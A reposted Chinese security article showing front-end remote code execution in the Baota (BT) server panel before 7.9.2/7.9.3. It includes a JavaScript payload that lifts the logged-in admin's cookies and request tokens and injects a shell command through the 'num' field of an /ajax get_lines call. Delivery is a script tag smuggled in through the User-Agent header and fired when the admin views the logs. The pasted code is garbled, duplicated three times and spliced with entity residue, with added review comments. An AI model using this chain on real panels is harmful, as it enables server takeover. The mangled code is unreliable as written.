宝塔面板前台RCE


RCE1

版本 < 7.9.2

恶意 js

// NOTE(review): this paste lost its line breaks during extraction and is
// duplicated three times with HTML-entity residue ("amp;", "quot;") spliced in.
// As printed, the jQuery-loading IIFE on the first line and the
// `let cookies = document.cookie;` declaration sit inside `//` comments, and
// the inline comment after the `data:` object swallows the rest of every
// `$.ajax({...})` call, so none of the copies below parses. The text is kept
// exactly as the article shows it; only comments were added.
//
// What the fragments show (defender reading):
//  - the first line, when uncommented, loads jQuery from code.jquery.com before
//    the rest of the script uses `$`;
//  - getCookie(): returns the value of a named cookie from document.cookie of
//    the currently logged-in panel user (or null);
//  - all_headers: forwards that user's Cookie header plus the panel's own
//    tokens (`request_token` cookie → x-cookie-token, and the `token`
//    attribute of #request_token_head → x-http-token), i.e. the request rides
//    on an already-authenticated panel session rather than bypassing auth;
//  - $.ajax GET /ajax with action=get_lines: the `num` field, presumably meant
//    to be an integer, carries shell metacharacters — this is the injection
//    point the article describes (it says versions < 7.9.2 are affected; the
//    fix on the vendor side should be confirmed against their advisory).
//
// Detection hints grounded in this fragment: a get_lines request whose `num`
// is not a plain integer, or an x-http-token/x-cookie-token request that
// originates from a page the admin merely viewed (the article's delivery is a
// stored XSS via a crafted User-Agent rendered in the panel's log view).
//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
// First copy: the `replace(..., "\...")` string literal below was split by the
// extractor and never closes, so this line is a syntax error as shown.
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\//JQuery preload (optional)(function(){ var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
// Second copy of getCookie(): escapes regex metacharacters in the cookie name,
// then captures everything up to the next ';' as the value.
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\$&") +"\s*\=\s*([^;]*).*$)|^.*$"), "$1")) || null;}
// Headers sent with the forged request; `cookies` is never declared in this
// paste (its `let` sits in a comment above), so it would be a ReferenceError.
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
// The `//` comment after the data object extends to end of line and also
// contains the tail of a third, entity-mangled copy of the script.
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //the shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});amp;") +"\s*\=\s*([^;]*).*$)|^.*//JQuery preload (optional)(function(){ var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
// Third copy (identical to the second).
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\$&") +"\s*\=\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
// The trailing `quot;), "$1")) || null;}` is leftover from the mangled copy.
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //the shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});quot;), "$1")) || null;}
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
// Last copy; even here the line comment hides `headers:` and `success:`, so
// the call never closes. The marker string in `num` ("BT RCE test ZAC") and the
// written path are the article's proof-of-execution, useful as a log IoC.
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //the shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});

访问宝塔面板部署的网站,并替换 UA

</tExtArEa>">src=https://localhost/1.js></script>

宝塔面板前台RCE

到后台点击日志,触发 XSS 导致 RCE

宝塔面板前台RCE

命令执行结果

宝塔面板前台RCE

RCE2

版本 <7.9.2
原理和上面的一致,poc 也一样

触发 Nginx 报错
宝塔面板前台RCE

到后台点日志-错误日志

宝塔面板前台RCE

验证结果

宝塔面板前台RCE

RCE3

版本 <7.9.3

可以确认的是存在 XSS 漏洞,但是 RCE 有难度;我本地使用宝塔 7.6.0 验证,存在斜杠被替换的问题,暂且不表。

针对 面板页面构造恶意xss

宝塔面板前台RCE

到安全-日志记录中去查找日志。

文章转载自:https://www.ankio.net/#/posts/79

原文始发于微信公众号(利刃信安):宝塔面板前台RCE

  • 本文由 发表于 2022年10月29日17:42:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   宝塔面板前台RCEhttp://cn-sec.com/archives/1379419.html
